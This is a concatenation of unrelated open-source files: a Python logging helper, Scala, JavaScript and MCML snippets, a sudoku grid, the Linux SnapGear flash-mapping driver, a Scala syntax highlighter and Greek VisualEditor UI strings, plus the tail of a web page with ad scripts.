<div><small>By accessing, viewing, downloading or otherwise using this content you agree to be bound by the <a href="/agreement.php">Terms of Use</a>!</small> <small>vxheaven.org aka vx.netlux.org</small></div>
<div style="margin-top: 2px; float: left;" class="adsapeu">
<script type="text/rocketscript">
<!--
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
//-->
</script>
</div>
<script data-rocketsrc="http://www.google-analytics.com/urchin.js" type="text/rocketscript"></script><script type="text/rocketscript">try { _uacct = "UA-590608-1"; urchinTracker(); } catch(err) {}</script>
<div style="display: none;"><a href="/vx.php?lang=de&id=si00">de</a><a href="/vx.php?lang=en&id=si00">en</a><a href="/vx.php?lang=es&id=si00">es</a><a href="/vx.php?lang=it&id=si00">it</a><a href="/vx.php?lang=fr&id=si00">fr</a><a href="/vx.php?lang=pl&id=si00">pl</a><a href="/vx.php?lang=ru&id=si00">ru</a><a href="/vx.php?lang=ua&id=si00">ua</a></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
"""
Some simple logging functionality, inspired by rllab's logging.
Assumes that each diagnostic gets logged each iteration
Call logz.configure_output_dir() to start logging to a
tab-separated-values file (some_folder_name/log.txt)
To load the learning curves, you can do, for example
A = np.genfromtxt('/tmp/expt_1468984536/log.txt',delimiter='\t',dtype=None, names=True)
A['EpRewMean']
"""
import os.path as osp
import time
import os
import subprocess
import atexit
# ANSI foreground color codes, keyed by human-readable color name.
color2num = {
    'gray': 30,
    'red': 31,
    'green': 32,
    'yellow': 33,
    'blue': 34,
    'magenta': 35,
    'cyan': 36,
    'white': 37,
    'crimson': 38,
}

def colorize(string, color, bold=False, highlight=False):
    """Wrap `string` in ANSI escape codes for terminal coloring.

    `color` must be a key of `color2num`. `highlight` selects the
    bright/background variant of the color (+10 on the code), and
    `bold` adds the bold attribute.
    """
    codes = [str(color2num[color] + (10 if highlight else 0))]
    if bold:
        codes.append('1')
    return '\x1b[%sm%s\x1b[0m' % (';'.join(codes), string)
class G:
    # Module-level mutable logging state; used as a namespace, never instantiated.
    output_dir = None       # directory the log file lives in
    output_file = None      # open handle for <output_dir>/log.txt
    first_row = True        # True until the first dump_tabular() completes
    log_headers = []        # column names; frozen after the first iteration
    log_current_row = {}    # key -> value accumulated for the current iteration
def configure_output_dir(d=None):
    """
    Set the output directory to `d`, or to /tmp/experiments/<timestamp> if
    `d` is None; create it if needed and open <dir>/log.txt for writing.

    Also tries to snapshot the current `git diff` into <dir>/a.diff so the
    code state of the experiment can be reconstructed later.
    """
    G.output_dir = d or "/tmp/experiments/%i"%int(time.time())
    #assert not osp.exists(G.output_dir), "Log dir %s already exists! Delete it first or use a different dir"%G.output_dir
    if not osp.exists(G.output_dir):
        os.makedirs(G.output_dir)
    # Handle stays open for the process lifetime; closed automatically at exit.
    G.output_file = open(osp.join(G.output_dir, "log.txt"), 'w')
    atexit.register(G.output_file.close)
    try:
        # NOTE(review): shell=True with interpolated paths — assumes the
        # module path and output dir are trusted (local experiment code).
        cmd = "cd %s && git diff > %s 2>/dev/null"%(osp.dirname(__file__), osp.join(G.output_dir, "a.diff"))
        subprocess.check_call(cmd, shell=True) # Save git diff to experiment directory
    except subprocess.CalledProcessError:
        print("configure_output_dir: not storing the git diff, probably because you're not in a git repo")
    print(colorize("Logging data to %s"%G.output_file.name, 'green', bold=True))
def log_tabular(key, val):
    """
    Log a value of some diagnostic.

    Call this once for each diagnostic quantity, each iteration.
    The key set is frozen after the first iteration (the first
    dump_tabular() writes the header row), so every later iteration
    must log exactly the same keys.
    """
    if G.first_row:
        # First iteration: collect column headers in the order keys arrive.
        G.log_headers.append(key)
    else:
        assert key in G.log_headers, "Trying to introduce a new key %s that you didn't include in the first iteration"%key
    assert key not in G.log_current_row, "You already set %s this iteration. Maybe you forgot to call dump_tabular()"%key
    G.log_current_row[key] = val
def dump_tabular():
    """
    Write all of the diagnostics from the current iteration.

    Prints an aligned two-column table to stdout and, if
    configure_output_dir() was called, appends a tab-separated row to
    the log file (preceded by a header row on the first dump).
    Afterwards the current-row buffer is cleared and the header set is
    frozen.
    """
    vals = []
    print("-"*37)
    for key in G.log_headers:
        # A key not logged this iteration renders as an empty cell.
        val = G.log_current_row.get(key, "")
        # Float-convertible values are shown with 3 significant digits.
        if hasattr(val, "__float__"): valstr = "%8.3g"%val
        else: valstr = val
        print("| %15s | %15s |"%(key, valstr))
        vals.append(val)
    print("-"*37)
    if G.output_file is not None:
        if G.first_row:
            G.output_file.write("\t".join(G.log_headers))
            G.output_file.write("\n")
        G.output_file.write("\t".join(map(str,vals)))
        G.output_file.write("\n")
        # Flush so the log file can be read while the run is in progress.
        G.output_file.flush()
    G.log_current_row.clear()
    G.first_row=False
"pile_set_name": "Github"
} |
package scorex.core.network.message
import scorex.core.app.Version
import scorex.core.serialization.ScorexSerializer
/**
 * Base trait for application-level p2p messages in the network.
 *
 * A MessageSpec both identifies a message type (code + name) and knows
 * how to serialize its payload, via the inherited ScorexSerializer.
 */
trait MessageSpec[Content] extends ScorexSerializer[Content] {

  /**
   * The p2p protocol version in which this message type first appeared
   */
  val protocolVersion: Version

  /**
   * Code which identifies what message type is contained in the payload
   */
  val messageCode: Message.MessageCode

  /**
   * Name of this message type. For debug purposes only.
   */
  val messageName: String

  // Human-readable form used in logs and debugging output.
  override def toString: String = s"MessageSpec($messageCode: $messageName)"
}
/**
 * P2p messages that were implemented since the beginning, i.e. present
 * from the initial protocol version.
 */
trait MessageSpecV1[Content] extends MessageSpec[Content] {

  override val protocolVersion: Version = Version.initial
}
"pile_set_name": "Github"
} |
/**
* Imports
*/
import BaseStore from 'fluxible/addons/BaseStore';
import orderActions from '../../constants/orders';
/**
 * Store
 *
 * Fluxible store holding the currently viewed order, together with the
 * request state of the last fetch/save (loading/saving flags and error).
 * Handlers are dispatched by action type via the static `handlers` map.
 */
class OrderDetailsStore extends BaseStore {

    static storeName = 'OrderDetailsStore';

    // Maps dispatched action constants to handler method names.
    static handlers = {
        [orderActions.ORDERS_ITEM]: 'handleFetchRequest',
        [orderActions.ORDERS_ITEM_SUCCESS]: 'handleFetchSuccess',
        [orderActions.ORDERS_ITEM_ERROR]: 'handleFetchError',

        [orderActions.ORDERS_UPDATE]: 'handleSaveRequest',
        [orderActions.ORDERS_UPDATE_SUCCESS]: 'handleSaveSuccess',
        [orderActions.ORDERS_UPDATE_ERROR]: 'handleSaveError'
    };

    constructor(dispatcher) {
        super(dispatcher);
        this.loading = false;   // a fetch request is in flight
        this.saving = false;    // a save request is in flight
        this.error = undefined; // last error payload (null after a success)
        this.order = undefined; // last fetched/saved order payload
    }

    // Snapshot of the full store state (used by dehydrate as well).
    getState() {
        return {
            loading: this.loading,
            saving: this.saving,
            error: this.error,
            order: this.order
        }
    }

    //
    // Isomorphic stuff
    //

    // Serialize state for server -> client transfer.
    dehydrate() {
        return this.getState();
    }

    // Restore state from a dehydrated snapshot on the client.
    rehydrate(state) {
        this.loading = state.loading;
        this.saving = state.saving;
        this.error = state.error;
        this.order = state.order;
    }

    //
    // Getters
    //

    isLoading() {
        return this.loading === true;
    }

    isSaving() {
        return this.saving === true;
    }

    getError() {
        return this.error;
    }

    getOrder() {
        return this.order;
    }

    //
    // Handlers
    //

    // Fetch lifecycle: request -> success | error.
    handleFetchRequest() {
        this.loading = true;
        this.emitChange();
    }

    handleFetchSuccess(payload) {
        this.loading = false;
        this.error = null;
        this.order = payload;
        this.emitChange();
    }

    handleFetchError(payload) {
        this.loading = false;
        this.error = payload;
        this.emitChange();
    }

    // Save lifecycle: request -> success | error.
    handleSaveRequest() {
        this.saving = true;
        this.emitChange();
    }

    handleSaveSuccess(payload) {
        this.saving = false;
        this.error = null;
        this.order = payload;
        this.emitChange();
    }

    handleSaveError(payload) {
        this.saving = false;
        this.error = payload;
        this.emitChange();
    }
}

/**
 * Export
 */
export default OrderDetailsStore;
| {
"pile_set_name": "Github"
} |
<Mcml xmlns="http://schemas.microsoft.com/2008/mcml"
xmlns:cor="assembly://MSCorLib/System"
xmlns:me="Me">
<!-- IsType conditions are used in "expanded" rule syntax for -->
<!-- adding type comparison to rules. A type is supplied to the -->
<!-- condition which is used to determine if the specified Source -->
<!-- represents that type. -->
<!-- IsType checks if an object "is-a" type (where the type can be -->
<!-- any type, including interfaces). -->
<!-- This example implements a "TypeChecker" UI which will display a -->
<!-- different message depending on what type of object that's -->
<!-- passed into it. -->
<UI Name="IsTypeCondition">
<Content>
<!-- Pass a value into the type checker. Since "Value" is an -->
<!-- object-typed property, full property value syntax must -->
<!-- be used so that the parser knows the type you want (in -->
<!-- this case an integer). -->
<me:TypeChecker>
<Value>
<cor:Int32 Int32="4"/>
</Value>
</me:TypeChecker>
</Content>
</UI>
<!-- TypeChecker: Displays a different message based on type. -->
<UI Name="TypeChecker">
<Properties>
<cor:Object Name="Value"
Object="$Required"/>
</Properties>
<Rules>
<!-- Check for strings. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:String"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's a string!"/>
</Actions>
</Rule>
<!-- Check for integers. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:Int32"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's an integer!"/>
</Actions>
</Rule>
<!-- Check for floats. -->
<Rule>
<Conditions>
<IsType Source="[Value]"
Type="cor:Single"/>
</Conditions>
<Actions>
<Set Target="[Label.Content]"
Value="IsType says it's a float!"/>
</Actions>
</Rule>
</Rules>
<Content>
<Text Name="Label"
Color="SeaShell"
Font="Verdana,30"/>
</Content>
</UI>
</Mcml>
| {
"pile_set_name": "Github"
} |
1 |6 2|3 5
8 7| 3|4
6 |1 |9
---+---+---
9 | 18|7
3 | |
7 | |
---+---+---
35 |9 |
8 | | 76
| |5 3
| {
"pile_set_name": "Github"
} |
/****************************************************************************/
/*
* nettel.c -- mappings for NETtel/SecureEdge/SnapGear (x86) boards.
*
* (C) Copyright 2000-2001, Greg Ungerer ([email protected])
* (C) Copyright 2001-2002, SnapGear (www.snapgear.com)
*/
/****************************************************************************/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/mtd/mtd.h>
#include <linux/mtd/map.h>
#include <linux/mtd/partitions.h>
#include <linux/mtd/cfi.h>
#include <linux/reboot.h>
#include <linux/err.h>
#include <linux/kdev_t.h>
#include <linux/root_dev.h>
#include <asm/io.h>
/****************************************************************************/
/* Flash bus widths, in bytes. */
#define INTEL_BUSWIDTH 1
#define AMD_WINDOW_MAXSIZE 0x00200000
#define AMD_BUSWIDTH 1

/*
 * PAR masks and shifts, assuming 64K pages.
 * The SC520 Programmable Address Region (PAR) registers encode a chip
 * select, a window size and a start address into one 32-bit word; the
 * macros below pack and unpack that encoding.
 */
#define SC520_PAR_ADDR_MASK 0x00003fff
#define SC520_PAR_ADDR_SHIFT 16
#define SC520_PAR_TO_ADDR(par) \
	(((par)&SC520_PAR_ADDR_MASK) << SC520_PAR_ADDR_SHIFT)

#define SC520_PAR_SIZE_MASK 0x01ffc000
#define SC520_PAR_SIZE_SHIFT 2
#define SC520_PAR_TO_SIZE(par) \
	((((par)&SC520_PAR_SIZE_MASK) << SC520_PAR_SIZE_SHIFT) + (64*1024))

/* Build a PAR register value from chip select, start address and window size. */
#define SC520_PAR(cs, addr, size) \
	((cs) | \
	((((size)-(64*1024)) >> SC520_PAR_SIZE_SHIFT) & SC520_PAR_SIZE_MASK) | \
	(((addr) >> SC520_PAR_ADDR_SHIFT) & SC520_PAR_ADDR_MASK))

/* Chip-select field values for the PAR registers. */
#define SC520_PAR_BOOTCS 0x8a000000
#define SC520_PAR_ROMCS1 0xaa000000
#define SC520_PAR_ROMCS2 0xca000000 /* Cache disabled, 64K page */

/* ioremap()ed SC520 MMCR register block (physical 0xfffef000). */
static void *nettel_mmcrp = NULL;

#ifdef CONFIG_MTD_CFI_INTELEXT
static struct mtd_info *intel_mtd;
#endif
static struct mtd_info *amd_mtd;
/****************************************************************************/
/****************************************************************************/
#ifdef CONFIG_MTD_CFI_INTELEXT
/* Map descriptor for the Intel flash window; size is probed in nettel_init(). */
static struct map_info nettel_intel_map = {
	.name = "SnapGear Intel",
	.size = 0,
	.bankwidth = INTEL_BUSWIDTH,
};

/*
 * Partition layout for the Intel flash. Several offsets/sizes here are
 * placeholders that nettel_init() fixes up once the real device size is
 * known (filesystem size, whole-device size, BIOS regions at the end).
 */
static struct mtd_partition nettel_intel_partitions[] = {
	{
		.name = "SnapGear kernel",
		.offset = 0,
		.size = 0x000e0000
	},
	{
		.name = "SnapGear filesystem",
		.offset = 0x00100000,
	},
	{
		.name = "SnapGear config",
		.offset = 0x000e0000,
		.size = 0x00020000
	},
	{
		.name = "SnapGear Intel",
		.offset = 0
	},
	{
		.name = "SnapGear BIOS Config",
		.offset = 0x007e0000,
		.size = 0x00020000
	},
	{
		.name = "SnapGear BIOS",
		.offset = 0x007e0000,
		.size = 0x00020000
	},
};
#endif

/* Map descriptor for the (optional) AMD boot flash window. */
static struct map_info nettel_amd_map = {
	.name = "SnapGear AMD",
	.size = AMD_WINDOW_MAXSIZE,
	.bankwidth = AMD_BUSWIDTH,
};

/*
 * AMD flash partition layout. The last ("high BIOS") entry is dropped at
 * init time for devices smaller than 2MB.
 */
static struct mtd_partition nettel_amd_partitions[] = {
	{
		.name = "SnapGear BIOS config",
		.offset = 0x000e0000,
		.size = 0x00010000
	},
	{
		.name = "SnapGear BIOS",
		.offset = 0x000f0000,
		.size = 0x00010000
	},
	{
		.name = "SnapGear AMD",
		.offset = 0
	},
	{
		.name = "SnapGear high BIOS",
		.offset = 0x001f0000,
		.size = 0x00010000
	}
};

#define NUM_AMD_PARTITIONS ARRAY_SIZE(nettel_amd_partitions)
/****************************************************************************/
#ifdef CONFIG_MTD_CFI_INTELEXT
/*
 * Set the Intel flash back to read mode since some old boot
 * loaders don't.
 */
static int nettel_reboot_notifier(struct notifier_block *nb, unsigned long val, void *v)
{
	struct cfi_private *cfi = nettel_intel_map.fldrv_priv;
	unsigned long b;

	/* Make sure all FLASH chips are put back into read mode */
	/* 0xff is the CFI "read array" command; one command is issued per
	 * 0x100000 step across the device — presumably one per chip/bank,
	 * TODO confirm against the board's flash layout. */
	for (b = 0; (b < nettel_intel_partitions[3].size); b += 0x100000) {
		cfi_send_gen_cmd(0xff, 0x55, b, &nettel_intel_map, cfi,
			cfi->device_type, NULL);
	}
	return(NOTIFY_OK);
}

static struct notifier_block nettel_notifier_block = {
	nettel_reboot_notifier, NULL, 0
};
#endif
/****************************************************************************/
/*
 * Probe and register the board's flash devices.
 *
 * Maps the SC520 MMCR register block, then probes BOOTCS for an AMD
 * boot flash (JEDEC). If one is found, the Intel flash (if configured)
 * is mapped after it; otherwise the board boots from Intel flash and
 * the chip-select/PAR setup is derived from the boot loader's values.
 * Finally the appropriate partition tables are registered with MTD.
 */
static int __init nettel_init(void)
{
	volatile unsigned long *amdpar;
	unsigned long amdaddr, maxsize;
	int num_amd_partitions=0;
#ifdef CONFIG_MTD_CFI_INTELEXT
	volatile unsigned long *intel0par, *intel1par;
	unsigned long orig_bootcspar, orig_romcs1par;
	unsigned long intel0addr, intel0size;
	unsigned long intel1addr, intel1size;
	int intelboot, intel0cs, intel1cs;
	int num_intel_partitions;
#endif
	int rc = 0;

	nettel_mmcrp = (void *) ioremap_nocache(0xfffef000, 4096);
	if (nettel_mmcrp == NULL) {
		printk("SNAPGEAR: failed to disable MMCR cache??\n");
		return(-EIO);
	}

	/* Set CPU clock to be 33.000MHz */
	*((unsigned char *) (nettel_mmcrp + 0xc64)) = 0x01;

	/* PAR register for BOOTCS lives at MMCR offset 0xc4. */
	amdpar = (volatile unsigned long *) (nettel_mmcrp + 0xc4);

#ifdef CONFIG_MTD_CFI_INTELEXT
	intelboot = 0;
	intel0cs = SC520_PAR_ROMCS1;
	intel0par = (volatile unsigned long *) (nettel_mmcrp + 0xc0);
	intel1cs = SC520_PAR_ROMCS2;
	intel1par = (volatile unsigned long *) (nettel_mmcrp + 0xbc);

	/*
	 * Save the CS settings then ensure ROMCS1 and ROMCS2 are off,
	 * otherwise they might clash with where we try to map BOOTCS.
	 */
	orig_bootcspar = *amdpar;
	orig_romcs1par = *intel0par;
	*intel0par = 0;
	*intel1par = 0;
#endif

	/*
	 * The first thing to do is determine if we have a separate
	 * boot FLASH device. Typically this is a small (1 to 2MB)
	 * AMD FLASH part. It seems that device size is about the
	 * only way to tell if this is the case...
	 */
	amdaddr = 0x20000000;
	maxsize = AMD_WINDOW_MAXSIZE;

	*amdpar = SC520_PAR(SC520_PAR_BOOTCS, amdaddr, maxsize);
	/* Flush/invalidate caches after reprogramming the address window. */
	__asm__ ("wbinvd");

	nettel_amd_map.phys = amdaddr;
	nettel_amd_map.virt = ioremap_nocache(amdaddr, maxsize);
	if (!nettel_amd_map.virt) {
		printk("SNAPGEAR: failed to ioremap() BOOTCS\n");
		iounmap(nettel_mmcrp);
		return(-EIO);
	}
	simple_map_init(&nettel_amd_map);

	if ((amd_mtd = do_map_probe("jedec_probe", &nettel_amd_map))) {
		printk(KERN_NOTICE "SNAPGEAR: AMD flash device size = %dK\n",
			(int)(amd_mtd->size>>10));
		amd_mtd->owner = THIS_MODULE;

		/* The high BIOS partition is only present for 2MB units */
		num_amd_partitions = NUM_AMD_PARTITIONS;
		if (amd_mtd->size < AMD_WINDOW_MAXSIZE)
			num_amd_partitions--;
		/* Don't add the partition until after the primary INTEL's */

#ifdef CONFIG_MTD_CFI_INTELEXT
		/*
		 * Map the Intel flash into memory after the AMD
		 * It has to start on a multiple of maxsize.
		 */
		maxsize = SC520_PAR_TO_SIZE(orig_romcs1par);
		if (maxsize < (32 * 1024 * 1024))
			maxsize = (32 * 1024 * 1024);
		intel0addr = amdaddr + maxsize;
#endif
	} else {
#ifdef CONFIG_MTD_CFI_INTELEXT
		/* INTEL boot FLASH */
		intelboot++;

		if (!orig_romcs1par) {
			intel0cs = SC520_PAR_BOOTCS;
			intel0par = (volatile unsigned long *)
				(nettel_mmcrp + 0xc4);
			intel1cs = SC520_PAR_ROMCS1;
			intel1par = (volatile unsigned long *)
				(nettel_mmcrp + 0xc0);

			intel0addr = SC520_PAR_TO_ADDR(orig_bootcspar);
			maxsize = SC520_PAR_TO_SIZE(orig_bootcspar);
		} else {
			/* Kernel base is on ROMCS1, not BOOTCS */
			intel0cs = SC520_PAR_ROMCS1;
			intel0par = (volatile unsigned long *)
				(nettel_mmcrp + 0xc0);
			intel1cs = SC520_PAR_BOOTCS;
			intel1par = (volatile unsigned long *)
				(nettel_mmcrp + 0xc4);

			intel0addr = SC520_PAR_TO_ADDR(orig_romcs1par);
			maxsize = SC520_PAR_TO_SIZE(orig_romcs1par);
		}

		/* Destroy useless AMD MTD mapping */
		amd_mtd = NULL;
		iounmap(nettel_amd_map.virt);
		nettel_amd_map.virt = NULL;
#else
		/* Only AMD flash supported */
		rc = -ENXIO;
		goto out_unmap2;
#endif
	}

#ifdef CONFIG_MTD_CFI_INTELEXT
	/*
	 * We have determined the INTEL FLASH configuration, so lets
	 * go ahead and probe for them now.
	 */

	/* Set PAR to the maximum size */
	if (maxsize < (32 * 1024 * 1024))
		maxsize = (32 * 1024 * 1024);
	*intel0par = SC520_PAR(intel0cs, intel0addr, maxsize);

	/* Turn other PAR off so the first probe doesn't find it */
	*intel1par = 0;

	/* Probe for the size of the first Intel flash */
	nettel_intel_map.size = maxsize;
	nettel_intel_map.phys = intel0addr;
	nettel_intel_map.virt = ioremap_nocache(intel0addr, maxsize);
	if (!nettel_intel_map.virt) {
		printk("SNAPGEAR: failed to ioremap() ROMCS1\n");
		rc = -EIO;
		goto out_unmap2;
	}
	simple_map_init(&nettel_intel_map);

	intel_mtd = do_map_probe("cfi_probe", &nettel_intel_map);
	if (!intel_mtd) {
		rc = -ENXIO;
		goto out_unmap1;
	}

	/* Set PAR to the detected size */
	intel0size = intel_mtd->size;
	*intel0par = SC520_PAR(intel0cs, intel0addr, intel0size);

	/*
	 * Map second Intel FLASH right after first. Set its size to the
	 * same maxsize used for the first Intel FLASH.
	 */
	intel1addr = intel0addr + intel0size;
	*intel1par = SC520_PAR(intel1cs, intel1addr, maxsize);
	__asm__ ("wbinvd");
	maxsize += intel0size;

	/* Delete the old map and probe again to do both chips */
	map_destroy(intel_mtd);
	intel_mtd = NULL;
	iounmap(nettel_intel_map.virt);

	nettel_intel_map.size = maxsize;
	nettel_intel_map.virt = ioremap_nocache(intel0addr, maxsize);
	if (!nettel_intel_map.virt) {
		printk("SNAPGEAR: failed to ioremap() ROMCS1/2\n");
		rc = -EIO;
		goto out_unmap2;
	}

	intel_mtd = do_map_probe("cfi_probe", &nettel_intel_map);
	if (! intel_mtd) {
		rc = -ENXIO;
		goto out_unmap1;
	}

	intel1size = intel_mtd->size - intel0size;
	if (intel1size > 0) {
		*intel1par = SC520_PAR(intel1cs, intel1addr, intel1size);
		__asm__ ("wbinvd");
	} else {
		/* Only one chip present; disable the second window. */
		*intel1par = 0;
	}

	printk(KERN_NOTICE "SNAPGEAR: Intel flash device size = %lldKiB\n",
	       (unsigned long long)(intel_mtd->size >> 10));

	intel_mtd->owner = THIS_MODULE;

	num_intel_partitions = ARRAY_SIZE(nettel_intel_partitions);
	if (intelboot) {
		/*
		 * Adjust offset and size of last boot partition.
		 * Must allow for BIOS region at end of FLASH.
		 */
		nettel_intel_partitions[1].size = (intel0size + intel1size) -
			(1024*1024 + intel_mtd->erasesize);
		nettel_intel_partitions[3].size = intel0size + intel1size;
		nettel_intel_partitions[4].offset =
			(intel0size + intel1size) - intel_mtd->erasesize;
		nettel_intel_partitions[4].size = intel_mtd->erasesize;
		nettel_intel_partitions[5].offset =
			nettel_intel_partitions[4].offset;
		nettel_intel_partitions[5].size =
			nettel_intel_partitions[4].size;
	} else {
		/* No BIOS regions when AMD boot */
		num_intel_partitions -= 2;
	}
	rc = mtd_device_register(intel_mtd, nettel_intel_partitions,
				 num_intel_partitions);
#endif

	if (amd_mtd) {
		rc = mtd_device_register(amd_mtd, nettel_amd_partitions,
					 num_amd_partitions);
	}

#ifdef CONFIG_MTD_CFI_INTELEXT
	register_reboot_notifier(&nettel_notifier_block);
#endif

	return(rc);

#ifdef CONFIG_MTD_CFI_INTELEXT
out_unmap1:
	iounmap(nettel_intel_map.virt);
#endif

out_unmap2:
	iounmap(nettel_mmcrp);
	iounmap(nettel_amd_map.virt);

	return(rc);
}
/****************************************************************************/
/*
 * Module exit: unregister the reboot notifier, then tear down every
 * MTD device and mapping that nettel_init() may have created. Each
 * resource is checked individually so a partially-initialized state
 * is cleaned up safely.
 */
static void __exit nettel_cleanup(void)
{
#ifdef CONFIG_MTD_CFI_INTELEXT
	unregister_reboot_notifier(&nettel_notifier_block);
#endif
	if (amd_mtd) {
		mtd_device_unregister(amd_mtd);
		map_destroy(amd_mtd);
	}
	if (nettel_mmcrp) {
		iounmap(nettel_mmcrp);
		nettel_mmcrp = NULL;
	}
	if (nettel_amd_map.virt) {
		iounmap(nettel_amd_map.virt);
		nettel_amd_map.virt = NULL;
	}
#ifdef CONFIG_MTD_CFI_INTELEXT
	if (intel_mtd) {
		mtd_device_unregister(intel_mtd);
		map_destroy(intel_mtd);
	}
	if (nettel_intel_map.virt) {
		iounmap(nettel_intel_map.virt);
		nettel_intel_map.virt = NULL;
	}
#endif
}

/****************************************************************************/

module_init(nettel_init);
module_exit(nettel_cleanup);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Greg Ungerer <[email protected]>");
MODULE_DESCRIPTION("SnapGear/SecureEdge FLASH support");
/****************************************************************************/
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:d1ecb296a6bbaf5d28e97428198041562820e9e33675dba7afbea73545dfa06d
size 7885
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>
</startup>
</configuration>
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: e89bad6ca44e28f41abe9217d6458fd1
MonoImporter:
externalObjects: {}
serializedVersion: 2
defaultReferences: []
executionOrder: 0
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
package main

// DO NOT EDIT, this file is generated by hover at compile-time for the testplu2 plugin.

import (
	flutter "github.com/go-flutter-desktop/go-flutter"
	file_picker "github.com/miguelpruivo/plugins_flutter_file_picker/go"
)

func init() {
	// Only the init function can be tweaked by the plugin maker.
	// Registers the file_picker plugin with the go-flutter embedder by
	// appending to the shared `options` slice — presumably declared in a
	// sibling generated file; not visible here.
	options = append(options, flutter.AddPlugin(&file_picker.FilePickerPlugin{}))
}
| {
"pile_set_name": "Github"
} |
// Copyright (C) 2010 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview
* Registers a language handler for Scala.
*
* Derived from http://lampsvn.epfl.ch/svn-repos/scala/scala-documentation/trunk/src/reference/SyntaxSummary.tex
*
* @author [email protected]
*/
// Register a two-pass lexer for Scala with google-code-prettify.
// The first array holds "shortcut" patterns dispatched by first character;
// the second holds fallback patterns tried in order.
PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'], /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double or single quoted string
         // or a triple double-quoted multi-line string.
         [PR['PR_STRING'],
          /^(?:"(?:(?:""(?:""?(?!")|[^\\"]|\\.)*"{0,3})|(?:[^"\r\n\\]|\\.)*"?))/,
          null, '"'],
         // Backquoted identifiers are styled as literals.
         [PR['PR_LITERAL'], /^`(?:[^\r\n\\`]|\\.)*`?/, null, '`'],
         [PR['PR_PUNCTUATION'], /^[!#%&()*+,\-:;<=>?@\[\\\]^{|}~]+/, null,
          '!#%&()*+,-:;<=>?@[\\]^{|}~']
        ],
        [
         // A symbol literal is a single quote followed by an identifier with no
         // single quote following
         // A character literal has single quotes on either side
         [PR['PR_STRING'], /^'(?:[^\r\n\\']|\\(?:'|[^\r\n']+))'/],
         [PR['PR_LITERAL'], /^'[a-zA-Z_$][\w$]*(?!['$\w])/],
         [PR['PR_KEYWORD'], /^(?:abstract|case|catch|class|def|do|else|extends|final|finally|for|forSome|if|implicit|import|lazy|match|new|object|override|package|private|protected|requires|return|sealed|super|throw|trait|try|type|val|var|while|with|yield)\b/],
         [PR['PR_LITERAL'], /^(?:true|false|null|this)\b/],
         // Integer (octal/hex/decimal) and floating-point literals.
         [PR['PR_LITERAL'], /^(?:(?:0(?:[0-7]+|X[0-9A-F]+))L?|(?:(?:0|[1-9][0-9]*)(?:(?:\.[0-9]+)?(?:E[+\-]?[0-9]+)?F?|L?))|\\.[0-9]+(?:E[+\-]?[0-9]+)?F?)/i],
         // Treat upper camel case identifiers as types.
         [PR['PR_TYPE'], /^[$_]*[A-Z][_$A-Z0-9]*[a-z][\w$]*/],
         [PR['PR_PLAIN'], /^[$a-zA-Z_][\w$]*/],
         // Line (//) and block (/* */) comments, possibly unterminated.
         [PR['PR_COMMENT'], /^\/(?:\/.*|\*(?:\/|\**[^*/])*(?:\*+\/?)?)/],
         [PR['PR_PUNCTUATION'], /^(?:\.+|\/)/]
        ]),
    ['scala']);
| {
"pile_set_name": "Github"
} |
{
"@metadata": {
"authors": [
"Astralnet",
"Dipa1965",
"Evropi",
"FocalPoint",
"GR",
"Geraki",
"Giorgos456",
"Glavkos",
"Nikosgranturismogt",
"Nikosguard",
"Tifa93"
]
},
"visualeditor": "VisualEditor",
"visualeditor-aliencontextitem-title": "Αντικείμενο",
"visualeditor-aliennode-tooltip": "Συγγνώμη, προς το παρόν η επεξεργασία αυτού του στοιχείου μπορεί να γίνει μόνο με τον επεξεργαστή κώδικα.",
"visualeditor-align-desc-center": "κέντρο",
"visualeditor-align-desc-default": "προεπιλογή",
"visualeditor-align-desc-left": "αριστερά",
"visualeditor-align-desc-none": "καμία",
"visualeditor-align-desc-right": "δεξιά",
"visualeditor-align-widget-center": "Κέντρο",
"visualeditor-align-widget-default": "Προεπιλογή",
"visualeditor-align-widget-left": "Αριστερά",
"visualeditor-align-widget-right": "Δεξιά",
"visualeditor-alignablecontextitem-title": "Ευθυγράμμιση",
"visualeditor-annotationbutton-big-tooltip": "Μεγάλα",
"visualeditor-annotationbutton-bold-tooltip": "Έντονα",
"visualeditor-annotationbutton-code-tooltip": "Κώδικας υπολογιστή",
"visualeditor-annotationbutton-italic-tooltip": "Πλάγια",
"visualeditor-annotationbutton-language-tooltip": "Γλώσσα",
"visualeditor-annotationbutton-link-tooltip": "Σύνδεσμος",
"visualeditor-annotationbutton-small-tooltip": "Μικρά",
"visualeditor-annotationbutton-strikethrough-tooltip": "Επιλογή προς διαγραφή",
"visualeditor-annotationbutton-subscript-tooltip": "Δείκτης",
"visualeditor-annotationbutton-superscript-tooltip": "Εκθέτης",
"visualeditor-annotationbutton-underline-tooltip": "Υπογράμμιση",
"visualeditor-changedesc-align": "Η στοίχιση άλλαξε από $1 σε $2",
"visualeditor-changedesc-changed": "Το $1 άλλαξε από $2 σε $3",
"visualeditor-changedesc-comment": "Το σχόλιο άλλαξε από $1 σε $2",
